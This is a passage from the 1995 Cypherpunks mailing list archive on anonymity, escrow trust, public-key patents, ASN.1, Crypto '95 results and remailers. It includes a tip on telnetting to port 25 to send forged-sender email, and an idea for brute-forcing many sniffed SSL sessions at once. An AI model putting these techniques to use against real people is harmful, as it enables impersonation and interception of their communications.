year, and put it in my anonymous ftp account at > ftp.netcom.com, in the directory /pub/tc/tcmay, as the file CP-FAQ. Netcom > is often very crowded, though. > > I know of a couple of alternative places. A very nice job of HTMLizing it > was done by Jonathan Rochkind, a Cypherpunk, and is located at the URL > > http://www.oberlin.edu/~brchkind/cyphernomicon/ > > Another URL, which is just one large file, is > > http://www.swiss.ai.mit.edu/6095/articles/cyphernomicon/CP-FAQ :::::::::::::::::::::::::::::::::::::: :: Lou Poppler :: No animals were harmed in the :: http://www.msen.com/~lwp/ :: production of this message. :::::::::::::::::::::::::::::::::::::: From dsc at swcp.com Sat Sep 2 22:49:23 1995 From: dsc at swcp.com (Dar Scott) Date: Sat, 2 Sep 95 22:49:23 PDT Subject: A problem with anonymity Message-ID: Having not read the FAQ, I foolishly jump in... Timothy May wrote, >At 2:38 AM 9/3/95, MONTY HARDER wrote: > >> But if the escrow agent is anonymous, we simply recurse, moving now to >>the question of whether anyone can trust the Anonymous Escrow Agency not >>to take the money and run. > >Well, at one level, everything is always recursive. [snip] >And, of course, it is possible to structure things so that the escrow agent >cannot "take the money and run," because the money is not accessible to >them. > >This is analogous to an escrow agent in the real world holding a check from >Alice to Bob until Bob completes some set of conditions. The escrow >agent--call her Essie--cannot cash the check herself. She can of course >renege on the deal, even if Bob does his part of the bargain, but there is >little incentive for her to do so. For example, the money exchanger or bank can allow an exchange option that packages up the new money for some AND/OR list of package openers, certify what it is and then seal it up & send it to the escrow agent. As mentioned by Timothy and Monty this just pushes the question down to whether anyone can trust the bank. Timothy claims evidence that there will be entities such as banks that do not scam customers. I observe that from a few trusted entities a great amount of trust can be created--bubbling up that same recursion. In the above example, the trust of the Anonymous Escrow Agency is increased by the mechanism that does not allow the agency to get at the cash. This uses the trust of the bank, but does not decrease the trust of the bank. Perhaps trust formal transfer mechanisms can evolve so that almost everybody can become almost as trustworthy as the most trustworthy entity in the commerce. Dar (who knows he should have checked the FAQ) =========================================================== Dar Scott Home phone: +1 505 299 9497 Dar Scott Consulting Voice: +1 505 299 5790 <--- 8637 Horacio Place NE Email: darscott at aol.com Albuquerque, NM 87111 dsc at swcp.com Fax: +1 505 898 6525 http://www.swcp.com/~correspo/DSC/DarScott.html My preference for attached files are in this order: AOL, Mime, Binhex4, PGP, UUencode =========================================================== From edge at got.net Sun Sep 3 00:06:05 1995 From: edge at got.net (Jay Campbell) Date: Sun, 3 Sep 95 00:06:05 PDT Subject: Mailing List Archive Message-ID: For personal reasons (my dislike for big mailboxes) I've set up hypermail to archive the Cypherpunks list at: http://got.net/CypherpunksArchive/ If someone else has done this, I'll stop fiddling with the configs and come use yours. I just set it up, so it's rather empty today... If someone has a non-html archive of the messages, I'm up to tossing some perl around and converting it for the archive. -- Jay Campbell - Regional Operations Manager -=-=-=-=-=-=- Sense Networking (Santa Cruz Node) edge at you.got.net "Shoot the Fruit Loop" 408.469.9400 From perry at piermont.com Sun Sep 3 00:14:55 1995 From: perry at piermont.com (Perry E. Metzger) Date: Sun, 3 Sep 95 00:14:55 PDT Subject: Phil Zimmermann/Amnesty International? In-Reply-To: Message-ID: <199509021658.MAA29224@frankenstein.piermont.com> Alan Westrope writes: > On Fri, 01 Sep 1995, Michael Froomkin wrote: > > > I think he would have to be charged first. Have I missed something? > > PS when does the statute of limitations run out? > > June '96. Zimmermann and Dubois appeared on a local talk radio show > recently; a friend happened to catch the program, taped it, and played > excerpts at a Cypherpunks meeting. This date was mentioned by Phil Dubois. That's not possible. The offense in question took place on or before September 8, 1992, and the statute of limitations is, to my knowledge, three years. Even if it were four years, it would have to be September 8th of that year. Branko Lankester announced availability of PGP 2.0 on Mon, 7 Sep 1992 at about 20:22 GMT, so since the allegation is that he exported PGP Version 1.0 to the team that developed PGP 2.0 overseas, any export that Phil performed would have of necessity to have taken place before then. Michael, you are one of our local lawyers. Could you please confirm the length of the statute of limitations? Perry From edge at got.net Sun Sep 3 00:18:05 1995 From: edge at got.net (Jay Campbell) Date: Sun, 3 Sep 95 00:18:05 PDT Subject: Mailing List Archive In-Reply-To: Message-ID: On Sun, 3 Sep 1995, Jay Campbell wrote: > For personal reasons (my dislike for big mailboxes) I've set up > hypermail to archive the Cypherpunks list at: > > http://got.net/CypherpunksArchive/ Oops - the real (but temporary) URL is actually: http://got.net:8080/CypherpunksArchive/ -- Jay Campbell - Regional Operations Manager -=-=-=-=-=-=- Sense Networking (Santa Cruz Node) edge at you.got.net "Shoot the Fruit Loop" 408.469.9400 From mark at unicorn.com Sun Sep 3 00:34:22 1995 From: mark at unicorn.com (Rev. Mark Grant) Date: Sun, 3 Sep 95 00:34:22 PDT Subject: Dumb Question: PGPfone over Appletalk Message-ID: Can someone tell me how to run PGPfone over Appletalk ? The documentation says that support has been added for this release, and there's a preferences box to check to use it, but there's no information I can find in the documentation on how to initiate a call over Appletalk.. it just says to enter a telephone number to dial. If I press 'Connect' without entering anything it hangs up the Mac. How do I tell it which machine I want to connect to ? Mark "Don't know much about Macs" Grant From droelke at rdxsunhost.aud.alcatel.com Sun Sep 3 00:34:28 1995 From: droelke at rdxsunhost.aud.alcatel.com (Daniel R. Oelke) Date: Sun, 3 Sep 95 00:34:28 PDT Subject: Basic Public key algorithms. Message-ID: <9509021801.AA07301@spirit.aud.alcatel.com> After doing quite a bit of poking around, I am somewhat discouraged in my attempts to find a simple *pure* public key encryption method, without a lot of other stuff wrapped around it. What I need is to encrypt between 45 and 55 bits of information using a public key algorithm in an embedded environment. Memory usage needs to be minimal (a couple of K), and CPU usage will be tradded off based on key length. Decryption speed/memory usage is not very limited (done on a workstation, not on embedded system). I could use RSA (which is well described in many sources, and has RSAREF out there), but I want to avoid the patent issue if possible. The sci.crypt FAQ mentions that there are other methods but that is about all it says. Are there any that are not patented? Are there any that someone knows of that work well in a limited memory environment? Thanks for any/all pointers. Dan ------------------------------------------------------------------ Dan Oelke Alcatel Network Systems droelke at aud.alcatel.com Richardson, TX From perry at piermont.com Sun Sep 3 00:34:32 1995 From: perry at piermont.com (Perry E. Metzger) Date: Sun, 3 Sep 95 00:34:32 PDT Subject: Basic Public key algorithms. In-Reply-To: <9509021801.AA07301@spirit.aud.alcatel.com> Message-ID: <199509021813.OAA29335@frankenstein.piermont.com> Daniel R. Oelke writes: > I could use RSA (which is well described in many sources, and has > RSAREF out there), but I want to avoid the patent issue if possible. > The sci.crypt FAQ mentions that there are other methods but that > is about all it says. Are there any that are not patented? No, because one patent covers public key cryptography itself, and not a particular method. .pm From jis at mit.edu Sun Sep 3 00:34:34 1995 From: jis at mit.edu (Jeffrey I. Schiller) Date: Sun, 3 Sep 95 00:34:34 PDT Subject: ASN.1 and Kerberos version 5 Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Perry E. Metzger writes: >I've heard people associated with the decision to use ASN.1 in >Kerberos V say it was a mistake. Frankly, I think ASN.1 is a blight >which should be exterminated from the planet. I'll say it. I was the person who pushed for the use of ASN.1 in Kerberos version 5. I had this disease at the time that made me think that ASN.1 was a good idea. I got better, unfortunately we have been living with the results of my braino for quite some time now... poor Ted. However, the problem with ASN.1 isn't its waste of space (which actually isn't that bad for a mechanism for encoding arbitrary objects). The problem is that it is the product of a standards making process that didn't (and doesn't) value interoperability. Adherence to the ISO specifications does not guarantee interoperation. Instead regional "workshops" negotiate aspects of implementations to obtain interoperation. What does this mean for ASN.1? It means that the definition of ASN.1 is a bit abstract (as its name implies). Problems result when two organizations (say MIT and OSF!) attempt to implement from the specification in ASN.1 but use different ASN.1 compilers and things then don't work. Arguments then ensue about whose compiler (or manually written parsing code) is "correct" in terms of doing the right thing with ASN.1. This is particularly so when using DER (for Distinquished Encoding Rules) which is itself an after-thought added to ASN.1 later in the process. It is required in order to verify digital signatures (which have to be computed on the "encoded" form of an object because there is no good way to calculate a signature on an "abstract" object). If the Kerberos specification said: "pub this byte here and that one there" none of these arguments and problems would happen. -Jeff -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMEiaf8UtR20Nv5BtAQFzNAP/Q/LuIMbxAPAp64Kn2PSPd600TYlRAUJh QbsuL/iRhGXWrxSjsFzkcr6e3sIpSFggxglFU38TJT/DG2AD8MOid3Uj4pRJVbyo z7Au0Vp1NiotmRBHq2udItzJ7LLPM0j38FHQenqPs9mkX2Cq5kVgGUBO94HabEuE S9XPCgV8E1Q= =kTyw -----END PGP SIGNATURE----- From ravage at einstein.ssz.com Sun Sep 3 00:34:37 1995 From: ravage at einstein.ssz.com (Jim Choate) Date: Sun, 3 Sep 95 00:34:37 PDT Subject: Austin Cypherpunks Message-ID: <199509021825.NAA00547@einstein.ssz.com> Hi all, This is of real interest to Austin subscribers only... It has been over a year since the last real meeting of the Austin Cypherpunks. I am interested in getting the group back on a regular schedule and writing code and building hardware. If you share this interest then please drop me a note at ravage at einstein.ssz.com I have created a mailing list for the local members and if interested then send a subscribe austin-cpunks to list at einstein.ssz.com That is all. Jim Choate CyberTects ravage at einstein.ssz.com From adam at bwh.harvard.edu Sun Sep 3 01:00:36 1995 From: adam at bwh.harvard.edu (Adam Shostack) Date: Sun, 3 Sep 95 01:00:36 PDT Subject: Crypto '95 Message-ID: <199509021859.OAA02093@bwh.harvard.edu> Perry asked for an overview of Crypto '95. I missed the rump session, so hopefully someone else will write about that. The best talks were probably by Ross Anderson (Robustness Principles for Public Key Protocols) and Adi Shamir (Myths and Realities of Cryptography). Since Anderson's paper is in the proceedings, I won't rehash it here, but Shamir's talk is not, I present his 10 commandments of Commercial Security: 1. Don't aim for perfect security. 2. Don't solve the wrong problem. 3. Don't try to sell security bottom up. 4. Don't use cryptographic overkill. 5. Don't make it complicated. 6. Don't make it expensive. 7. Don't use a single line of defense. 8. Don't forget the mystery attack. (Know how to regenerate security when you don't know whats going wrong.) 9. Don't trust systems. 10. Don't trust people. In other news: Richard Schroeppel, Hillarie Orman (and others) presented some speedups to elliptic curve systems, based on fast calculation of reciprocals. The speedup is about a factor of 3. There were some interesting analysis of RC5, SAFER-K64. Bruce Dodsen and Arjen Lenstra presented some interesting results running NFS with four large primes. From their abstract: "[factoring with 2 large primes] completion time can quite accurately be predicted...For NFS such extrapolations seem to be impossible--the number o useful combinations suddenly `explodes' in an as yet unpredictable way, that we have not yet been able to understand completely. The consequence of this is that NFS factoring is substantially faster than expected, which implies that factoring is somewhat easier than we thought." Please note that that doesn't mean RSA has been broken, or that they can factor products of large primes in their heads. It means that there are speedups possible, but not enough that anyone should be worrying about a 1024 bit key. The best quote of the conference was doubtless Robert Morris, Sr, reminding us of the first rule of cryptanalysis, "Don't forget to look for plaintext." Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From don at cs.byu.edu Sun Sep 3 01:43:06 1995 From: don at cs.byu.edu (don at cs.byu.edu) Date: Sun, 3 Sep 95 01:43:06 PDT Subject: SSLRef (SSLtelnet) Message-ID: <199509030845.CAA00124@wero.byu.edu> -----BEGIN PGP SIGNED MESSAGE----- I have been looking at a number of SSLTelnet/FTP programs (available from utopia.hacktic.nl by the way) and they would seem to all require Netscape's library. Anyone know about this? I found the following link for SSLRef but I was just wondering if it was the only way to implement SSL telnet&ftp. I would hate to see people not be able to use them simply because there's no illegal copies available. URL: http://home.netscape.com/info/sslref.html If anyone knows of any clones or foreign sources please speak up. Don -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQB1AwUBMElX4cLa+QKZS485AQERIQL/SBZAOAdAWSzfl/W9GNfDEU7e+3pBua5s z84iGGuT5CfCGM4X5rYGKV4DuRVfFPyNQc++bn8SpPgyenbvBK+gc6400FHVskr3 Y4HAlBTqSSoyfOUHlhnEAs63nsjDGdFM =ihYg -----END PGP SIGNATURE----- fRee cRyPTo! jOin the hUnt or BE tHe PrEY PGP key - http://bert.cs.byu.edu/~don or PubKey servers (0x994b8f39) June 7&14, 1995: 1st amendment repealed. Death threats ALWAYS pgp signed * This user insured by the Smith, Wesson, & Zimmermann insurance company * PS: my failure to lament violations of ITAR should not be confused with actual involvment in criminal activity. Heh heh heh. Catchyalater From monty.harder at famend.com Sun Sep 3 01:45:44 1995 From: monty.harder at famend.com (MONTY HARDER) Date: Sun, 3 Sep 95 01:45:44 PDT Subject: O.J. ObCrypto: Fuhrman's Folly Fans Fakery Fears... Message-ID: <8B0556B.00030003E0.uuout@famend.com> RA> separate step/pass) Encrypt the Signed Message (IOW is E+S just a short cut RA> for the two processes done in sequence using the same key for both The only way that -es uses the same key for both the encryption and signature is if I have EncryptToSelf turned on, or I explicity specify my signature key as one of the recipients. My privkey is used for the signature, but =your= pubkey is used for the encryption. * A dork with a modem can become a dork with a modem and an Internet address. --- * Monster at FAmend.Com * From Cybie at cris.com Sun Sep 3 02:07:59 1995 From: Cybie at cris.com (Cybie at cris.com) Date: Sun, 3 Sep 95 02:07:59 PDT Subject: Direct Socket to Remailer? In-Reply-To: Message-ID: <9509030907.AA04231@mariner.cris.com> > > At 7:25 PM 9/1/95, ROBO Mixmaster Remailer wrote: > >I've heard of telnetting to port 25 to send SEMI-untraceable e-mail. > >The procedure, quite frankly, sounds rather complicated. > > > > You should try the telnet port 25 trick. It is amazingly simple (but not > secure). Just "telnet some.machine.com 25" and type help. It will guide you > through it. It is quite informative. > > -Lance Before you do it, make sure your ISP doesn't mind you telneting to port 25. VCU's computer dept. doesn't take to kindly to it. They're worried about people sending forged e-mail. (I was tempted to tell the guy when I got caught doing it that they should put a copy of PGP online for folks to use. But I just wanted my account re-instated.) From perry at piermont.com Sun Sep 3 02:23:04 1995 From: perry at piermont.com (Perry E. Metzger) Date: Sun, 3 Sep 95 02:23:04 PDT Subject: Basic Public key algorithms. In-Reply-To: Message-ID: <199509030031.UAA29612@frankenstein.piermont.com> Ben writes: > > Daniel R. Oelke writes: > > > I could use RSA (which is well described in many sources, and has > > > RSAREF out there), but I want to avoid the patent issue if possible. > > > The sci.crypt FAQ mentions that there are other methods but that > > > is about all it says. Are there any that are not patented? > > > > No, because one patent covers public key cryptography itself, and not > > a particular method. > > Point of information--I'm not flaming you Perry, but Public Key Partners > claims that their patent covers all forms of Public Key Crypto. How is this at all different from what I just said? .pm From anon-remailer at utopia.hacktic.nl Sun Sep 3 02:50:21 1995 From: anon-remailer at utopia.hacktic.nl (Name Withheld by Request) Date: Sun, 3 Sep 95 02:50:21 PDT Subject: Crypto '95: Robert Morris Message-ID: <199509030950.LAA15691@utopia.hacktic.nl> So Robert Morris worked for NSA. Does that mean that the infamous 1988 Internet Worm was part of a NSA-sponsored intelligence-gathering mission? From Andrew.Spring at ping.be Sun Sep 3 03:04:39 1995 From: Andrew.Spring at ping.be (Andrew Spring) Date: Sun, 3 Sep 95 03:04:39 PDT Subject: sums with BIG numbers Message-ID: Deranged Mutant wrote: >> >What do you mean? How big numbers are added (trivially easier than >multiplication >or division) or how it handles numbers that are too large for the variable's >size? and Ray Cromwell wrote : To add two bignums, P(x) and Q(x) simply sum coefficients of like terms like you would with any polynomial addition, with one simple modification. If a_k is the coefficient of the x^k term of P(x), and etc, etc. Just a quick clarification, people: In the UK, and, presumably Australia, "doing sums" refers to performing any kind of arithmetic, not just addition. And to Sherry Mayo: Don't give up on the code, just yet. Try running it and watching it with a debugger. From lyalc at ozemail.com.au Sun Sep 3 04:45:46 1995 From: lyalc at ozemail.com.au (lyal collins) Date: Sun, 3 Sep 95 04:45:46 PDT Subject: A bold ssl idea ? Message-ID: <199509031145.VAA12843@oznet02.ozemail.com.au> Having watched the discussions of recent of the SSL bruting, it occured to me that a variation could also be useful. I understand that setting up RC4 keys is slower that testing for the correct key (I may have misuderstood this bit). As a company using SSL can ahve all it's SSL traffic sniffed, from multiple people accessing, a log can easily be built of message/keys. Is it considered practical to modify the brutessl code to have multiple message data, and test each against a key from allocated key space ? If so, this may mean that perhaps 3 message can be tested against a single in the time two single keys could be tested against one message. An an attack scenario, this is a hell of a lot more "efficient" than current trials have been. I realise this could also be considered a bit of target for the main purpose of demonstrating weaknesses, and improving techiquess. My thoughts, anyway - i hope they make sense. lyal From jya at pipeline.com Sun Sep 3 05:35:15 1995 From: jya at pipeline.com (John Young) Date: Sun, 3 Sep 95 05:35:15 PDT Subject: 260_xxx Message-ID: <199509031235.IAA19851@pipe4.nyc.pipeline.com> 9-3-95. NYPaper: "It's a Hacker Meeting, So Hide Your Phones." Razor and Curious George showed up. Angstrom and Tigerboy and Cameo came, Rebel and Master Chemist, and the revered Emmanuel Goldstein. And there were dozens more, the illicit apparatus for filching pay-phone calls secreted deep in the pockets of shredded jeans, the hand-held Newton minicomputers at the ready. It was a time for all prudent people to hide their cellular phones and guard their calling cards, and for those who despise Nynex, Bell Atlantic and AT&T to rejoice. Because the electronic virtuosos in the public lobby of the Citicorp building at 53d Street and Lexington Avenue were networking to share clever and highly illegal ways of fooling the phone system and the corporate computer guard dogs meant to keep them out. 260_xxx From jya at pipeline.com Sun Sep 3 05:38:29 1995 From: jya at pipeline.com (John Young) Date: Sun, 3 Sep 95 05:38:29 PDT Subject: ARS_tug Message-ID: <199509031238.IAA19949@pipe4.nyc.pipeline.com> 9-3-95. NYPaper: "Aircraft Carrier May Give Way To Missile Ship." The aircraft carrier may soon be shoved off center stage by a new "arsenal ship" that would be able to rain 500 missiles within a matter of minutes on targets hundreds of miles away, without risking pilots' lives. A carrier costs $4.5 billion to build and $440 million a year to operate. The new ship, essentially a floating missile barge, might cost only $500 million and just tens of millions a year to run. The new ship would fire Tomahawk cruise missiles, long-range artillery shells or rocket barrages against ammunition dumps, command posts and artillery. It could prove particularly valuable in the early stages of a crisis, before ground troops were in place. It would travel with other ships and submarines for protection, and target information would be provided by other vessels, reconnaissance aircraft, pilotless drones or ground spotters. The 825-foot ship might require fewer than 20 people to operate, compared with the 5,000 aboard a 1,040-foot carrier. ARS_tug From ab411 at detroit.freenet.org Sun Sep 3 05:53:33 1995 From: ab411 at detroit.freenet.org (David R. Conrad) Date: Sun, 3 Sep 95 05:53:33 PDT Subject: Florida Drivers Permits and a Hello Message-ID: <199509031253.IAA23207@detroit.freenet.org> -----BEGIN PGP SIGNED MESSAGE----- Bill Stewart writes: >At 08:41 PM 8/29/95 -0400, [ I, Dave Conrad ] wrote: >>One benefit to law enforcement, quite apart from the ability to verify a >>license, would be the accumulation of a database of thumbprints of all >>citizens, or at least all those who drive. > >They can get that by just collecting it when you get the license (which CA >does), without having to cram it onto the back of the license. Obviously, but I think many people would resist it if they collect it just for the sake of collecting it. But if they say they are collecting it to put on the license in order to verify licenses "in the field", then the collection will be a lot more palatable to a lot more people. Have people in CA complained much that they collect it when you get the license? -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMEmhsxEcrOJethBVAQHFqQP9HvbaGMe4pQhlH1EsS9MKuC1L2+DlnXLb lhkzJ9OJHRBJ7lN437I2W04ec0YRZXv3vf3Y3CMlYD1w09Ih54ugZYWzQbG7meu/ SHikLH0KVz86RlCUi5qzCrX3Zs+sFXTvkTSJ5t7G7o24/wpxxB2hy+4NBedTPp3o yYWrn+p0sRU= =mzOJ -----END PGP SIGNATURE----- -- David R. Conrad, ab411 at detroit.freenet.org, http://www.grfn.org/~conrad Finger conrad at grfn.org for PGP 2.6 public key; it's also on my home page Key fingerprint = 33 12 BC 77 48 81 99 A5 D8 9C 43 16 3C 37 0B 50 Jerry Garcia, August 1, 1942 - August 9, 1995. Requiescat in pace. From johnl at radix.net Sun Sep 3 07:58:54 1995 From: johnl at radix.net (John A. Limpert) Date: Sun, 3 Sep 95 07:58:54 PDT Subject: Crypto '95: Robert Morris Message-ID: <199509031457.KAA21322@saltmine.radix.net> At 11:50 AM 9/3/95 +0200, you wrote: >So Robert Morris worked for NSA. >Does that mean that the infamous 1988 Internet Worm >was part of a NSA-sponsored intelligence-gathering mission? Robert Morris Jr. wrote the worm. His father, Robert Morris Sr. worked for the NSA. -- John A. Limpert johnl at Radix.Net From hfinney at shell.portal.com Sun Sep 3 08:18:22 1995 From: hfinney at shell.portal.com (hfinney at shell.portal.com) Date: Sun, 3 Sep 95 08:18:22 PDT Subject: Slightly faster checking for encrypted messages to me Message-ID: <199509031517.IAA26595@jobe.shell.portal.com> One idea we have often discussed is to use a public message pool such as a newsgroup or mailing list reflector as a means of receiving messages anonymously. Each message would be encrypted with my public key (or that of my pseudonym), but with the identifying information stripped. Then I need to scan them all to see which ones are encrypted to me. Those are the ones which decrypt under the public key system to a correctly padded session key. Doing it this way eavesdroppers can't even tell how much mail my nym is receiving. The problem is that doing a PK decrypt is time consuming, and if we had to do it to all the anonymous mail traffic in the world it could become impractical. I had hoped that Shamir's idea which I posted earlier would help with this, but I can't see an application. His idea helps to check for specific signatures, which is a thing anyone can do, but he lets you do it faster. We need a faster way to do a check which only the holder of the secret key can do. I have thought of a small improvement based on Shamir's ideas, though. Use Rabin encryption rather than RSA. In this system the decryption involves taking square roots. This is done by taking the square root of the ciphertext mod p and q (the two secret primes) and using the Chinese Remainder Theorem to get the square root mod n. (This is also done in RSA with eth roots.) If p and q are 3 mod 4, you can get the square root of x mod p as x^((p+1)/4) mod p. This is done for p and q and you then combine them. So the amount of work is pretty much the same as for RSA. However a speedup is possible to do a quicker check for a validly formed encrypted message. The idea is that the encrypted message is of the form M^2 mod n. This means that it is a quadratic residue mod n, and also therefore a q.r. mod p and q. So the speedup is simply to check whether it is a q.r. mod one of the primes and to reject it if not. This takes about half the amount of time to actually try the decryption. All valid messages will pass the test, and half of the invalid messages will be rejected. So this is not very strong, but it is perhaps better than nothing. Maybe Shamir will come up with some idea for this problem. As I wrote before, testing for a q.r. is done by raising to the (p-1)/2 power mod p, and seeing if the answer is 1. I think this can be done in such a way that if it does come out to be 1 we can use our intermediate results to calculate the (p+1)/4 needed for the square root very quickly. Also, BTW Rabin encryption is not specifically patented, only the relatively-untested and almost-expired patent which covers all public key systems (with the failed knapsack algorithm as its specific embodiment) would supposedly prevent its use. However even PKP is apparently becoming more reluctant to throw its weight around on this patent, while they are still quite possessive about RSA. So perhaps a migration to Rabin is in order. Hal From shamrock at netcom.com Sun Sep 3 08:19:46 1995 From: shamrock at netcom.com (Lucky Green) Date: Sun, 3 Sep 95 08:19:46 PDT Subject: Crypto '95: Robert Morris Message-ID: At 11:50 9/3/95, Name Withheld by Request wrote: >So Robert Morris worked for NSA. >Does that mean that the infamous 1988 Internet Worm >was part of a NSA-sponsored intelligence-gathering mission? The worm was relased by his son. -- Lucky Green PGP encrypted mail preferred. From shamrock at netcom.com Sun Sep 3 08:19:49 1995 From: shamrock at netcom.com (Lucky Green) Date: Sun, 3 Sep 95 08:19:49 PDT Subject: Florida Drivers Permits and a Hello Message-ID: At 8:53 9/3/95, David R. Conrad wrote: >Obviously, but I think many people would resist it if they collect it just >for the sake of collecting it. But if they say they are collecting it to >put on the license in order to verify licenses "in the field", then the >collection will be a lot more palatable to a lot more people. > >Have people in CA complained much that they collect it when you get the >license? The masses never complain. Fingerprints on driver licenses, pictures on credit cards, and the soon to be mandatory medical monitoring devices that continually check your bloodstream for toxins are for _your_ protection. People demand more, not less, supervision. The government will gladly oblige. -- Lucky Green PGP encrypted mail preferred. From Piete.Brooks at cl.cam.ac.uk Sun Sep 3 08:25:01 1995 From: Piete.Brooks at cl.cam.ac.uk (Piete Brooks) Date: Sun, 3 Sep 95 08:25:01 PDT Subject: A bold ssl idea ? In-Reply-To: <199509031145.VAA12843@oznet02.ozemail.com.au> Message-ID: <"swan.cl.cam.:180200:950903143250"@cl.cam.ac.uk> > I understand that setting up RC4 keys is slower that testing for the correct > key (I may have misuderstood this bit). For pure RC4, Yes. However, SSL is not pure RC4. > Is it considered practical to modify the brutessl code to have multiple > message data, and test each against a key from allocated key space ? You are the third person I've heard think of this. [ The first did quite a lot of calculations before spotting the problem ! ] > If so, this may mean that perhaps 3 message can be tested against a single > in the time two single keys could be tested against one message. Well, the original suggestion I heard was to try 64K at a time :-)) From jya at pipeline.com Sun Sep 3 08:25:23 1995 From: jya at pipeline.com (John Young) Date: Sun, 3 Sep 95 08:25:23 PDT Subject: PEE_per Message-ID: <199509031244.IAA20069@pipe4.nyc.pipeline.com> 9-3-95. NYPaper: "500,000 Clients, No Branches. Phone Banking Is Catching On." Bankers from around the world are making the pilgrimage to Leeds in the north of England for a miracle cure at their stagnant industry's equivalent of a Lourdes. Here is First Direct, a bank with half a million customers and not a single branch. It is the world's leading telephone-only bank; it is the fastest-growing bank in Britain. On the walls are sports stadium scoreboards, constantly flashing the number of customers on hold and how long they have been waiting. While a banker serves a customer, his computer screen is displaying all sorts of personal information about her. "No Adverse Risk" flashes at the top, indicating that the bank would be glad to loan her money. Also displayed is the fact that she is a 30-year-old single renter with a job as a project manager, along with a list of all the bank's prior contacts with her. PEE_per From shamrock at netcom.com Sun Sep 3 08:38:02 1995 From: shamrock at netcom.com (Lucky Green) Date: Sun, 3 Sep 95 08:38:02 PDT Subject: hks cypherpunks newsserver down Message-ID: nntp.hks.net's cypyherpunks mail -> news gateway has not shown new messages for more than a week. Strangely, only the cp list seems to be affected. Anyone know what's up? -- Lucky Green PGP encrypted mail preferred. From bigdaddy at ccnet.com Sun Sep 3 10:09:37 1995 From: bigdaddy at ccnet.com (bigdaddy at ccnet.com) Date: Sun, 3 Sep 95 10:09:37 PDT Subject: Direct Socket to Remailer? In-Reply-To: <9509030907.AA04231@mariner.cris.com> Message-ID: On Sun, 3 Sep 1995 Cybie at cris.com wrote: > Before you do it, make sure your ISP doesn't mind you telneting to port 25. > VCU's computer dept. doesn't take to kindly to it. They're worried about > people sending forged e-mail. (I was tempted to tell the guy when I got > caught doing it that they should put a copy of PGP online for folks to use. > But I just wanted my account re-instated.) CMU's systems, for instance, are nice enough to explicitly warn you 'Mis-identifying the sender is an abuse of computing resources.' on their machines' port 25. I take this to imply that they don't take kindly to such use of their machines by students or non-students...but what they would do to a non-CMU student is not clear. Come to think of it, would there be legal issues involved in forging e-mail addresses? Can one have a reasonable expectation of identity in ordinary e-mail? Probably not. How about mail authenticated with PGP, RIPEM, Notes, or a similar system? We've seen key certification by VeriSign, among others...and, if we assume a certification structure which requires checking the True Name of the person, then we have a link between the key and the identity. All well and good. If we add key escrow to this certification structure, or require a True Name for *all* keys, then one could have 'identity escrow'...a situation in which pseudonymous keys can be created and distributed with certification that they really belong to a (presumably unique) True Name. In the example of a bank with anonymous officers, their identities might be held by another organization(oversight committee, industry certification authority, etc.), and revealed in the event of an investigation. Doesn't VeriSign already sign 'Personality Certificates'(sorry if not the right term) for pseudonymous IDs? Obviously, setting and enforcing limits on keys per person, should that be desirable, could be difficult. In the simplest case of one verified key and identity per person, an entity who can satisfy the verification process multiple times can be issued multiple keys. If there are a number of independent Certification Authorities, and assuming they don't cross-check, one could get as many keys as there are CAs. Lag time between, say, the Dhahran, Saudi Arabia office of the CA and the rest of the structure might also allow for two or more keys at once. There's probably a dozen different ways to fool a CA or group of CAs. Unfortunately, they're likely to be so difficult, and the penalties severe enough(e.g. permanent revocation of all keys with a particular CA), that few will use them. I wonder if this sort of "feature" is already on tap for a Government Certification Authority in the U.S.. If pseudonymity is offered at all(perhaps as a sort of compromise), it seems reasonable that any State-sponsored CA would insist on identity escrow. The next logical step, of course, would be to subordinate, discredit, or outlaw other CAs, in order to minimize the 'possibility' of 'evil criminals' using the 'national information infrastructure' for 'nefarious acts of impersonation'. Web-of-trust would probably still be legal. It would be absurdity to even attempt to outlaw it, as one would hope the example of PGP has shown. One might as well outlaw gossip. Unfortunately, web-of-trust is rarely as extensive(at least for me) than a full-blown certification hierarchy. It is certainly more work. In effect, the State would reserve to itself the ability to certify keys on a large scale, on its terms. Scary. On the other hand, it could also make for some very interesting situations...such as a pseudonymous identity, accredited by the State, able to participate in elections, enter into binding contracts, and telecommute to work. Again, making sure no one registers and votes twice might be a bit of work. Perhaps down the line, such an identity could run for office. The line 'I'm With Stupid' takes on a whole new meaning... David Molnar P.S. Andrew L : Yes, I'm the same person you knew in Houston! Have you received the mail I sent you? -Haynow From perry at piermont.com Sun Sep 3 10:59:07 1995 From: perry at piermont.com (Perry E. Metzger) Date: Sun, 3 Sep 95 10:59:07 PDT Subject: Crypto '95: Robert Morris In-Reply-To: <199509030950.LAA15691@utopia.hacktic.nl> Message-ID: <199509031758.NAA01453@frankenstein.piermont.com> Name Withheld by Request writes: > So Robert Morris worked for NSA. > Does that mean that the infamous 1988 Internet Worm > was part of a NSA-sponsored intelligence-gathering mission? You have the junior and senior Robert Morris confused. .pm From mfroomki at umiami.ir.miami.edu Sun Sep 3 11:16:31 1995 From: mfroomki at umiami.ir.miami.edu (Michael Froomkin) Date: Sun, 3 Sep 95 11:16:31 PDT Subject: Mail to mail.cypherpunks "newsgroup" echoes to list Message-ID: I have been getting a load of duplicate mail from this group; not all messages are duplicated, only those cc'd to mail.cypherpunks as well as sent to the toad.com address. I don't know if this is a gateway to a local newsgroup or what, but I wish the duplication would stop. Thank you. A. Michael Froomkin | +1 (305) 284-4285; +1 (305) 284-6506 (fax) Associate Professor of Law | mfroomki at umiami.ir.miami.edu U. Miami School of Law | P.O. Box 248087 | It's hot here. And humid. Coral Gables, FL 33124 USA | See (experimentally & erratically) http://viper.law.miami.edu/~mfroomki ---------- Forwarded message ---------- Date: Sun, 03 Sep 1995 08:38:54 -0600 From: Piete Brooks To: lyal collins Cc: cypherpunks at toad.com, Piete.Brooks at cl.cam.ac.uk Newgroups: mail.cypherpunks Subject: Re: A bold ssl idea ? > I understand that setting up RC4 keys is slower that testing for the correct > key (I may have misuderstood this bit). For pure RC4, Yes. However, SSL is not pure RC4. > Is it considered practical to modify the brutessl code to have multiple > message data, and test each against a key from allocated key space ? You are the third person I've heard think of this. [ The first did quite a lot of calculations before spotting the problem ! ] > If so, this may mean that perhaps 3 message can be tested against a single > in the time two single keys could be tested against one message. Well, the original suggestion I heard was to try 64K 